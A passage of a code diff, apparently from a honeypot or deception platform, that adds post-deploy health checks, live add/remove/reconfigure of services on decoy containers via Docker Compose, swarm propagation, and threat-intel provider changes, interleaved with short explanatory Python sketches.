-log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Post-deploy verification: ``compose up -d`` returns 0 the moment
# containers are *started*, so a service that crashes on boot
# (port bind failure, bad image, missing dependency) leaves the
# topology row sitting at ACTIVE while half the substrate is dead.
# Sample compose ps once and downgrade to DEGRADED if any expected
# container isn't running — operators see real state instead of an
# optimistic flag.
ps_rows = await anyio.to_thread.run_sync(
lambda: _compose_ps(compose_path),
)
bad: list[str] = []
# Build the per-decky state map. The base container's compose
# service name == decky name, which is what we cache on the
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
# don't gate the decky's state — service-level failures are visible
# in compose ps separately and don't downgrade the decky as a whole.
decky_state_by_name: dict[str, str] = {}
for row in ps_rows:
state = str(row.get("State", "")).lower()
service_name = str(row.get("Service") or "")
if service_name and "-" not in service_name:
# Plain decky base; cache its docker state.
decky_state_by_name[service_name] = state or "unknown"
if state and state != "running":
name = str(row.get("Name") or row.get("Service") or "?")
exit_code = row.get("ExitCode")
bad.append(
f"{name}={state}"
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
)
# Reconcile each TopologyDecky.state from compose's view. Without
# this, the row stays at the default 'pending' forever and the
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
# actually up.
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
ds = decky_state_by_name.get(decky_name, "unknown")
new_state = "running" if ds == "running" else "failed"
try:
await repo.update_topology_decky(
decky["uuid"], {"state": new_state},
)
except Exception as exc: # noqa: BLE001
log.warning(
"post-deploy state reconcile failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
if bad:
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
)
await transition_status(
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
)
log.warning(
"topology %s deployed but %d container(s) unhealthy: %s",
topology_id, len(bad), reason,
)
else:
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
# Best-effort canary baseline seed across every decky in the
# topology. Same resilience contract as the fleet path: failures
# surface as state=failed token rows, never abort the deploy.
try:
from decnet.canary import planter as _canary_planter
await _canary_planter.seed_baseline_topology(repo, topology_id)
except Exception as exc: # noqa: BLE001
log.warning(
"canary baseline seed failed (best-effort) topology=%s err=%s",
topology_id, exc,
)
@_traced("engine.teardown_topology")

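The post-deploy check hinges on two steps: parsing newline-delimited JSON from `docker compose ps --format json`, and turning any non-running row into a short reason string. The sketch below isolates both as pure functions so they can be tested without Docker. `parse_ps_output` and `unhealthy` are hypothetical names, the field names (`State`, `Service`, `Name`, `ExitCode`) are the ones read in the diff, and the sample output is invented.

```python
import json


def parse_ps_output(stdout: str) -> list[dict]:
    """Parse newline-delimited JSON rows, skipping blank or malformed lines."""
    rows: list[dict] = []
    for line in stdout.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue  # one bad line must not poison the whole result
        if isinstance(obj, dict):
            rows.append(obj)
        elif isinstance(obj, list):
            # Tolerate a JSON array on a single line as well.
            rows.extend(item for item in obj if isinstance(item, dict))
    return rows


def unhealthy(rows: list[dict]) -> list[str]:
    """Describe every row whose state is reported and is not 'running'."""
    bad: list[str] = []
    for row in rows:
        state = str(row.get("State", "")).lower()
        if state and state != "running":
            name = str(row.get("Name") or row.get("Service") or "?")
            exit_code = row.get("ExitCode")
            suffix = f" (exit={exit_code})" if exit_code not in (None, 0, "") else ""
            bad.append(f"{name}={state}{suffix}")
    return bad
```

Rows with an empty `State` are deliberately not counted as failures, matching the "unverifiable, don't gate" stance in the `_compose_ps` docstring.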

@@ -0,0 +1,673 @@
"""Add/remove a single service on a deployed decky without full redeploy.
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
supports per-service targeting (``up --no-deps -d <svc>``,
``stop <svc>``, ``rm -f <svc>``). What was missing was the
orchestration: regenerate the compose file (so future redeploys reflect
the change), persist the new ``services`` list, and run the targeted
compose command.
Two scopes:
* **Topology** — source of truth is the ``topology_deckies`` table; the
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
* **Fleet** — source of truth is ``decnet-state.json`` (with the
``fleet_deckies`` table mirroring it); compose is the unihost
``decnet-compose.yml``.
Both publish ``decky.<name>.service.added`` /
``decky.<name>.service.removed`` on the bus. The new topic constants
are documented in ``wiki-checkout/Service-Bus.md``.
"""
from __future__ import annotations
import subprocess # nosec B404
from pathlib import Path
from typing import Any, Literal, Optional
import anyio
from decnet.bus import topics
from decnet.logging import get_logger
from decnet.services.base import BaseService
from decnet.services.registry import get_service
from decnet.topology.persistence import hydrate
from decnet.web.db.repository import BaseRepository
# Heavy imports (composer/deployer pull in decnet.network → docker) are
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
# pattern in decnet.canary.planter for the same reason.
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
"""Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
Real implementation lives in :mod:`decnet.engine.deployer`; we
import-and-delegate at call time to keep this module's import graph
clean (see module docstring above).
"""
from decnet.engine.deployer import _compose as _real_compose
if compose_file is None:
_real_compose(*args, env=env)
else:
_real_compose(*args, compose_file=compose_file, env=env)
def _topology_compose_path(topology_id: str) -> Path:
from decnet.engine.deployer import _topology_compose_path as _real_path
return _real_path(topology_id)
def _write_topology_compose(hydrated, path: Path) -> Path:
from decnet.topology.compose import write_topology_compose
return write_topology_compose(hydrated, path)
def _load_state():
from decnet.config import load_state as _real_load_state
return _real_load_state()
def _save_state(config, compose_path) -> None:
from decnet.config import save_state as _real_save_state
_real_save_state(config, compose_path)
def _write_compose(config, compose_path) -> None:
from decnet.composer import write_compose as _real_write_compose
_real_write_compose(config, compose_path)
def _get_bus():
from decnet.bus.factory import get_bus
return get_bus()
# --------------------------- swarm propagation helpers ---------------------------
#
# Service mutations (add/remove/update_config) on a deployed decky used to run
# the master's local docker-compose only. For swarm fleet deckies the master
# has no containers; for agent-targeted topologies the master only writes a
# compose file the worker never sees. These helpers replay the change to the
# worker so the env actually lands.
#
# Lazy imports keep this module's import graph clean (composer/swarm pull in
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
shards = await repo.list_decky_shards()
for s in shards:
if s.get("decky_name") == decky_name:
return s.get("host_uuid")
return None
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
"""Re-push the host's full shard to its worker agent.
Uses the same code path as POST /swarm/deploy: load master state, filter
to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
The agent regenerates compose and recreates only the changed containers.
Idempotent for unchanged deckies.
"""
from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
state = _load_state()
if state is None:
log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
return
config, _compose_path = state
host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
if not host_deckies:
log.warning(
"redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
host_uuid,
)
return
filtered = config.model_copy(update={"deckies": host_deckies})
await dispatch_decnet_config(filtered, repo)
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
"""If the topology is agent-pinned, push the latest hydrated blob to the worker."""
from decnet.engine.deployer import resync_agent_topology
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
if not hydrated.get("topology", {}).get("target_host_uuid"):
return # unihost topology — local compose is authoritative
await resync_agent_topology(repo, topology_id)
log = get_logger("engine.services_live")

DeckyKind = Literal["fleet", "topology"]


class ServiceMutationError(ValueError):
    """Raised for caller-correctable failures. The API layer dispatches on
    subclass to produce 4xx codes; base class maps to 422.
    """


class ServiceNotFoundError(ServiceMutationError):
    """Decky or topology does not exist → 404."""


class ServiceConflictError(ServiceMutationError):
    """Idempotency violation (already on / not on) → 409."""


def _validate_service_for_per_decky(name: str) -> BaseService:
    """Return the registered service or raise ``ServiceMutationError``.

    ``fleet_singleton`` services run once per fleet (e.g. an LLMNR
    responder), not per-decky — we reject the per-decky add/remove
    request rather than silently producing a no-op compose entry.
    """
    try:
        svc = get_service(name)
    except KeyError as exc:
        raise ServiceMutationError(f"unknown service {name!r}") from exc
    if svc.fleet_singleton:
        raise ServiceMutationError(
            f"service {name!r} is fleet_singleton; not addable per-decky"
        )
    return svc


async def _publish(topic: str, payload: dict[str, Any]) -> None:
    """Best-effort bus publish — same shape as the canary planter's helper."""
    try:
        bus = _get_bus()
        await bus.connect()
        await bus.publish(topic, payload)
        await bus.close()
    except Exception as e:  # noqa: BLE001
        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
# ---------------------------------------------------------- topology path


async def _topology_decky(
    repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        raise ServiceNotFoundError(f"topology {topology_id!r} not found")
    for d in hydrated["deckies"]:
        cfg = d.get("decky_config") or {}
        name = cfg.get("name") or d.get("name")
        if name == decky_name:
            return d
    raise ServiceNotFoundError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )


async def _rerender_topology_compose(
    repo: BaseRepository, topology_id: str,
) -> Path:
    """Re-hydrate + re-render the per-topology compose file.

    Called after a successful DB update so future deploys reflect the
    change; without this the file would still describe the old service
    set and a subsequent ``up -d`` would resurrect the removed service.
    """
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:  # pragma: no cover — narrow race
        raise ServiceNotFoundError(
            f"topology {topology_id!r} disappeared mid-mutation"
        )
    path = _topology_compose_path(topology_id)
    _write_topology_compose(hydrated, path)
    return path


async def _add_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    decky = await _topology_decky(repo, topology_id, decky_name)
    services: list[str] = list(decky.get("services") or [])
    if service_name in services:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services.append(service_name)
    update: dict[str, Any] = {"services": services}
    # If the caller supplied initial config, fold it into decky_config
    # BEFORE compose regen so the first ``up`` materialises the env on
    # the new container — no follow-up apply needed.
    if initial_config:
        cfg_blob = dict(decky.get("decky_config") or {})
        sc = dict(cfg_blob.get("service_config") or {})
        sc[service_name] = initial_config
        cfg_blob["service_config"] = sc
        update["decky_config"] = cfg_blob
    await repo.update_topology_decky(decky["uuid"], update)
    compose_path = await _rerender_topology_compose(repo, topology_id)

    if await _topology_is_agent_pinned(repo, topology_id):
        # Agent-pinned: the master's local compose has nothing to up.
        # Push the new hydrated blob to the worker.
        await _resync_agent_topology(repo, topology_id)
    else:
        target = f"{decky_name}-{service_name}"
        # Run compose in a worker thread so the API event loop stays
        # responsive — same pattern as engine/deployer.deploy_topology.
        await anyio.to_thread.run_sync(
            lambda: _compose(
                "up", "-d", "--no-deps", "--build", target,
                compose_file=compose_path,
            ),
        )
    return services


async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        return False
    return bool(hydrated.get("topology", {}).get("target_host_uuid"))
async def _remove_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
) -> list[str]:
    decky = await _topology_decky(repo, topology_id, decky_name)
    services: list[str] = list(decky.get("services") or [])
    if service_name not in services:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    services = [s for s in services if s != service_name]
    target = f"{decky_name}-{service_name}"
    compose_path = _topology_compose_path(topology_id)
    agent_pinned = await _topology_is_agent_pinned(repo, topology_id)

    if not agent_pinned:
        # Stop + rm before persisting + re-rendering so a half-completed
        # mutation leaves the operator a clear state to retry from
        # (container still running; DB still says service is on).
        await anyio.to_thread.run_sync(
            lambda: _compose("stop", target, compose_file=compose_path),
        )
        await anyio.to_thread.run_sync(
            lambda: _compose("rm", "-f", target, compose_file=compose_path),
        )

    await repo.update_topology_decky(decky["uuid"], {"services": services})
    await _rerender_topology_compose(repo, topology_id)

    if agent_pinned:
        # Worker tears down the removed service when it diffs the
        # incoming hydrated blob against its current state.
        await _resync_agent_topology(repo, topology_id)
    return services
# ---------------------------------------------------------- fleet path


def _fleet_state_or_raise() -> tuple[Any, Path]:
    state = _load_state()
    if state is None:
        raise ServiceMutationError(
            "no fleet state on disk — run `decnet up` first"
        )
    return state


def _fleet_find_decky(config: Any, decky_name: str) -> Any:
    for d in config.deckies:
        if d.name == decky_name:
            return d
    raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")


async def _persist_fleet_change(
    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
    """Persist the mutation to JSON state, compose file, and the DB row."""
    config, _ = _load_state()
    target = _fleet_find_decky(config, decky.name)
    target.services = services
    _save_state(config, compose_path)
    _write_compose(config, compose_path)
    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
    # change without waiting for the reconciler.
    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": services,
        "decky_config": target.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })


async def _add_fleet_service(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    services: list[str] = list(decky.services or [])
    if service_name in services:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services.append(service_name)
    if initial_config:
        # Same path as _update_fleet_service_config: stash the validated
        # cfg on the decky model so the compose write picks it up.
        sc = dict(getattr(decky, "service_config", None) or {})
        sc[service_name] = initial_config
        decky.service_config = sc
    await _persist_fleet_change(repo, decky, services, compose_path)

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if swarm_host_uuid:
        # Master has no container for this decky — re-push the host's
        # shard so the worker materialises the new service.
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
    else:
        target = f"{decky_name}-{service_name}"
        await anyio.to_thread.run_sync(
            lambda: _compose(
                "up", "-d", "--no-deps", "--build", target,
                compose_file=compose_path,
            ),
        )
    return services


async def _remove_fleet_service(
    repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    services: list[str] = list(decky.services or [])
    if service_name not in services:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    services = [s for s in services if s != service_name]
    target = f"{decky_name}-{service_name}"

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if not swarm_host_uuid:
        # Local: stop+rm before persist so the operator has a clear retry
        # state if compose fails halfway. Swarm: skip — the worker's compose
        # will handle the removal when the redispatched config drops the
        # service from the decky.
        await anyio.to_thread.run_sync(
            lambda: _compose("stop", target, compose_file=compose_path),
        )
        await anyio.to_thread.run_sync(
            lambda: _compose("rm", "-f", target, compose_file=compose_path),
        )

    await _persist_fleet_change(repo, decky, services, compose_path)

    if swarm_host_uuid:
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
    return services
# ---------------------------------------------------------- public api


async def add_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
    config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a deployed decky.

    Validates the service registry (rejects unknown / fleet_singleton
    names) and the optional ``config`` against the service's schema,
    persists the change, regenerates the compose file, runs
    ``up -d --no-deps --build <decky>-<service>`` in a worker thread,
    and publishes ``decky.<name>.service.added`` on the bus.

    ``config`` is the same dict shape PUT/POST .../config accepts; it's
    coerced via ``BaseService.validate_cfg`` before any state write so
    a 400-class failure leaves zero side-effects.

    Returns the post-mutation services list.
    """
    svc = _validate_service_for_per_decky(service_name)
    initial_config = svc.validate_cfg(config) if config else {}

    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _add_topology_service(
            repo, topology_id, decky_name, service_name,
            initial_config=initial_config,
        )
    elif decky_kind == "fleet":
        services = await _add_fleet_service(
            repo, decky_name, service_name,
            initial_config=initial_config,
        )
    else:  # pragma: no cover — Literal narrows
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
        {
            "decky_name": decky_name,
            "service_name": service_name,
            "topology_id": topology_id,
            "services": services,
        },
    )
    log.info(
        "services_live.add decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
async def update_service_config(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    cfg: dict,
    apply: bool = False,
    topology_id: Optional[str] = None,
) -> dict:
    """Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.

    The submitted dict is validated against the service's
    ``config_schema`` (unknown keys dropped, types coerced) BEFORE any
    DB write, so a 400-class failure leaves zero side-effects.

    ``apply=False`` (Save):  only the DB row + compose file are updated.
                             The running container keeps its old env.
    ``apply=True`` (Apply):  same persistence, then a force-recreate of
                             ``<decky>-<service>`` so the container picks
                             up the new env. Destructive: drops any
                             in-container session state on that service.

    Returns the post-mutation validated cfg.
    """
    svc = _validate_service_for_per_decky(service_name)
    validated = svc.validate_cfg(cfg)

    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        await _update_topology_service_config(
            repo, topology_id, decky_name, service_name, validated, apply=apply,
        )
    elif decky_kind == "fleet":
        await _update_fleet_service_config(
            repo, decky_name, service_name, validated, apply=apply,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
        {
            "decky_name": decky_name,
            "service_name": service_name,
            "topology_id": topology_id,
            "service_config": validated,
            "recreated": bool(apply),
        },
    )
    log.info(
        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
        decky_name, topology_id, service_name, apply,
    )
    return validated
async def _update_topology_service_config(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    decky = await _topology_decky(repo, topology_id, decky_name)
    if service_name not in (decky.get("services") or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    cfg_blob = dict(decky.get("decky_config") or {})
    sc = dict(cfg_blob.get("service_config") or {})
    sc[service_name] = validated
    cfg_blob["service_config"] = sc
    await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
    compose_path = await _rerender_topology_compose(repo, topology_id)

    if apply:
        if await _topology_is_agent_pinned(repo, topology_id):
            await _resync_agent_topology(repo, topology_id)
        else:
            target = f"{decky_name}-{service_name}"
            await anyio.to_thread.run_sync(
                lambda: _compose(
                    "up", "-d", "--no-deps", "--force-recreate", "--build", target,
                    compose_file=compose_path,
                ),
            )


async def _update_fleet_service_config(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    if service_name not in (decky.services or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    sc = dict(getattr(decky, "service_config", None) or {})
    sc[service_name] = validated
    decky.service_config = sc
    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": list(decky.services or []),
        "decky_config": decky.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })

    if apply:
        swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
        if swarm_host_uuid:
            await _redispatch_fleet_shard(repo, swarm_host_uuid)
        else:
            target = f"{decky_name}-{service_name}"
            # Docker Compose tracks the previous container by ID. If that
            # container was already removed (or renamed during a prior failed
            # deploy), --force-recreate fails with "No such container". Pre-
            # remove by name so Compose starts from a clean slate.
            await anyio.to_thread.run_sync(
                lambda: subprocess.run(  # nosec B603 B607
                    ["docker", "rm", "-f", target],
                    capture_output=True,
                ),
            )
            await anyio.to_thread.run_sync(
                lambda: _compose(
                    "up", "-d", "--no-deps", "--force-recreate", "--build", target,
                    compose_file=compose_path,
                ),
            )
async def remove_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
) -> list[str]:
    """Remove *service_name* from a deployed decky.

    Stops + removes the service container, persists the new services
    list, re-renders the compose file (so the next ``up -d`` doesn't
    bring it back), and publishes ``decky.<name>.service.removed``.

    Returns the post-mutation services list.
    """
    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _remove_topology_service(
            repo, topology_id, decky_name, service_name,
        )
    elif decky_kind == "fleet":
        services = await _remove_fleet_service(repo, decky_name, service_name)
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    await _publish(
        topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
        {
            "decky_name": decky_name,
            "service_name": service_name,
            "topology_id": topology_id,
            "services": services,
        },
    )
    log.info(
        "services_live.remove decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
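
The error classes in this file document a status code each (base class 422, not found 404, conflict 409) and say the API layer dispatches on subclass. A minimal sketch of what that dispatch could look like follows. The `status_for` helper and the lookup table are hypothetical and not part of this diff; the three classes are redeclared only so the sketch runs on its own.

```python
class ServiceMutationError(ValueError):
    """Caller-correctable failure; the base class maps to 422."""


class ServiceNotFoundError(ServiceMutationError):
    """Decky or topology does not exist."""


class ServiceConflictError(ServiceMutationError):
    """Idempotency violation (already on / not on)."""


# Hypothetical lookup table. Subclasses come first because isinstance()
# also matches the base class, which must stay the fallback.
_STATUS_BY_ERROR = (
    (ServiceNotFoundError, 404),
    (ServiceConflictError, 409),
    (ServiceMutationError, 422),
)


def status_for(exc: Exception) -> int:
    """Return the HTTP status for a mutation error, or 500 for anything else."""
    for cls, status in _STATUS_BY_ERROR:
        if isinstance(exc, cls):
            return status
    return 500
```

Ordering the table from most to least specific is the design point: a plain `isinstance(exc, ServiceMutationError)` check placed first would turn every 404 and 409 into a 422.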


@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
 # DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
 # updater / swarmctl subcommands (which never touch auth) can start without
 # the master's JWT secret being present in the environment.
-DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
+DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
 # Agent-side RFC 5424 sink written by decnet.collector.worker when run on
 # a SWARM worker. The forwarder tails this file and ships lines over
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
 DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
 DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
 DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
+# Bind address for the master-side swarm controller. Loopback by default —
+# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
+# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
+# swarmctl-host in /etc/decnet/decnet.ini.
+DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
 # Ingester batching: how many log rows to accumulate per commit, and the
 # max wait (ms) before flushing a partial batch. Larger batches reduce


@@ -128,8 +128,6 @@ async def reconcile_once(
     container_states = await asyncio.to_thread(
         _collect_container_states, docker_client_factory,
     )
-    docker_known = container_states is not None
     json_names = {d.name for d in json_deckies}
     # 1. INSERT: present in JSON, absent from DB.
@@ -138,7 +136,7 @@ async def reconcile_once(
             continue
         new_state = (
             _aggregate_decky_state(d.name, list(d.services), container_states)
-            if docker_known else "running"
+            if container_states is not None else "running"
         )
         row_host = d.host_uuid or host_uuid
         await repo.upsert_fleet_decky({
@@ -168,7 +166,7 @@ async def reconcile_once(
             )
     # 3. STATE: present in both, docker says something fresh.
-    if docker_known:
+    if container_states is not None:
         for d in json_deckies:
             existing = db_by_name.get(d.name)
             if existing is None:


@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
 from decnet.geoip.lookup import Lookup
 from decnet.geoip.paths import ensure_root
 from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
-from decnet.geoip.rir.parse import parse_file
+from decnet.geoip.rir.parse import Range, parse_file
 logger = logging.getLogger("decnet.geoip.rir.provider")
@@ -45,7 +45,7 @@ class RirProvider(Provider):
             except Exception as exc:
                 logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
-        ranges = []
+        ranges: list[Range] = []
         for path in self.data_paths():
             if not path.exists():
                 continue


@@ -17,7 +17,6 @@ later if operators report drift.
 """
 from __future__ import annotations
-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -93,12 +92,25 @@ class AbuseIPDBProvider(IntelProvider):
         data = payload.get("data") or {}
         score = int(data.get("abuseConfidenceScore") or 0)
         verdict = _score_to_verdict(score)
+        # AbuseIPDB returns ``data.reports[*].categories`` — a list of
+        # int codes per report. Flatten the union across all recent
+        # reports so the IntelLifter sees the full activity profile,
+        # not just the most-recent report's categories. Sorted for
+        # determinism (matters for tests + for the bus payload diff).
+        categories: set[int] = set()
+        for report in data.get("reports") or []:
+            if not isinstance(report, dict):
+                continue
+            for cat in report.get("categories") or []:
+                if isinstance(cat, int):
+                    categories.add(cat)
         return IntelResult(
             provider=self.name,
             verdict=verdict,
             column_updates={
                 "abuseipdb_score": score,
-                "abuseipdb_raw": json.dumps(data),
+                "abuseipdb_categories": sorted(categories),
+                "abuseipdb_raw": data,
                 "abuseipdb_queried_at": datetime.now(timezone.utc),
             },
         )
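
The category flattening added in this hunk can be exercised in isolation. The sketch below lifts the same loop into a standalone function; the name `flatten_categories` and the sample payload are made up for illustration and do not appear in the diff.

```python
from typing import Any


def flatten_categories(data: dict[str, Any]) -> list[int]:
    """Union the integer category codes across all reports, sorted."""
    categories: set[int] = set()
    for report in data.get("reports") or []:
        if not isinstance(report, dict):
            continue  # tolerate malformed entries instead of raising
        for cat in report.get("categories") or []:
            if isinstance(cat, int):
                categories.add(cat)
    return sorted(categories)


# Hypothetical payload: duplicate codes, a non-int code, a non-dict
# report, and a report whose categories field is null.
sample = {
    "reports": [
        {"categories": [18, 22]},
        {"categories": [22, 14, "x"]},
        "junk",
        {"categories": None},
    ]
}
print(flatten_categories(sample))  # [14, 18, 22]
```

One caveat worth knowing: `isinstance(True, int)` is true in Python, so a boolean in the list would pass the filter. Whether that matters depends on what the upstream API can actually return.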


@@ -78,3 +78,33 @@ class IntelProvider(ABC):
         entire IP. Implementations should also respect
         ``self._semaphore`` to bound in-flight calls.
         """
+
+
+class MalHashProvider(ABC):
+    """Abstract bad-hash lookup provider.
+
+    Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
+    vs IP), different consumer (the email ingester at observation time,
+    not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
+    the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
+
+    Concrete impls today:
+
+    * :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
+      shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
+
+    Future impls (paid VirusTotal subscription, in-house allowlist) plug
+    in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
+    """
+
+    name: str
+
+    @abstractmethod
+    async def is_known_bad(self, sha256: str) -> bool:
+        """Return whether *sha256* is on this provider's bad-hash list.
+
+        MUST NOT raise — return ``False`` on any error (the caller is the
+        ingester, not a worker; an exception here would taint a totally
+        unrelated bus payload). The provider is responsible for logging
+        its own errors.
+        """
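
To make the "MUST NOT raise" contract concrete, here is a minimal sketch of a conforming implementation backed by an in-memory set. `StaticSetProvider` is a hypothetical class invented for this example, and the ABC is redeclared in reduced form so the sketch is self-contained; neither is the code from this commit.

```python
import asyncio
from abc import ABC, abstractmethod
from typing import Iterable


class MalHashProvider(ABC):
    """Reduced copy of the ABC above, for a self-contained sketch."""

    name: str

    @abstractmethod
    async def is_known_bad(self, sha256: str) -> bool:
        ...


class StaticSetProvider(MalHashProvider):
    """Hypothetical provider: membership test against a fixed set."""

    name = "static-set"

    def __init__(self, hashes: Iterable[str]) -> None:
        self._known = {h.lower() for h in hashes}

    async def is_known_bad(self, sha256: str) -> bool:
        try:
            return sha256.lower() in self._known
        except Exception:
            # Contract: never raise. A non-string argument (e.g. None)
            # fails on .lower() and is reported as "not known bad".
            return False


provider = StaticSetProvider(["AB" * 32])
print(asyncio.run(provider.is_known_bad("ab" * 32)))  # True
```

A real provider would also log inside the `except` branch, since the docstring makes the provider responsible for reporting its own errors.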


@@ -21,7 +21,7 @@ from __future__ import annotations
 import os
 from typing import List
-from decnet.intel.base import IntelProvider
